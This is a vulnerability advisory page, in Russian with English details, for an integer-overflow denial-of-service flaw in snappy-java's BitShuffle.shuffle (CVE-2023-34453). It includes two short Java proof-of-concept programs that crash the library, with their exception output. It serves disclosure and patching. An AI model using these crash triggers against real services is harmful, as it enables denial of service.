GHSA-pqr6-cmr2-h8hf

Опубликовано: 15 июн. 2023

Источник: github

Github: Прошло ревью

CVSS3: 5.9

Описание

snappy-java's Integer Overflow vulnerability in shuffle leads to DoS

Summary

Due to unchecked multiplications, an integer overflow may occur, causing a fatal error.

Impact

Denial of Service

Description

The function shuffle(int[] input) in the file BitShuffle.java receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.

public static byte[] shuffle(int[] input) throws IOException { byte[] output = new byte[input.length * 4]; int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0); assert(numProcessed == input.length * 4); return output; }

Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”. The same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.

Steps To Reproduce

Compile and run the following code:

package org.example; import org.xerial.snappy.BitShuffle; import java.io.*; public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x40000000]; byte[] shuffled = BitShuffle.shuffle(original); System.out.println(shuffled[0]); } }

The program will crash, showing the following error (or similar):

Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0 at org.example.Main.main(Main.java:12) Process finished with exit code 1

Alternatively - compile and run the following code:

package org.example; import org.xerial.snappy.BitShuffle; import java.io.*; public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x20000000]; byte[] shuffled = BitShuffle.shuffle(original); } }

The program will crash with the following error (or similar):

Exception in thread "main" java.lang.NegativeArraySizeException: -2147483648 at org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108) at org.example.Main.main(Main.java:11)

Ссылки

Пакеты

Наименование

org.xerial.snappy:snappy-java

maven

Затронутые версииВерсия исправления

<= 1.1.10.0

1.1.10.1

EPSS

Процентиль: 81%

0.01503

Низкий

5.9 Medium

CVSS3

CVE ID

CVE-2023-34453

Дефекты

CWE-190

Связанные уязвимости

CVE-2023-34453

CVSS3: 5.9

ubuntu

больше 2 лет назад

snappy-java is a fast compressor/decompressor for Java. Due to unchecked multiplications, an integer overflow may occur in versions prior to 1.1.10.1, causing a fatal error. The function `shuffle(int[] input)` in the file `BitShuffle.java` receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function. Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a `java.lang.NegativeArraySizeException` exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as `java.lang.ArrayIndexOutOfBoundsException`. The same issue exists also when using the `shuffle` functions that receive a double...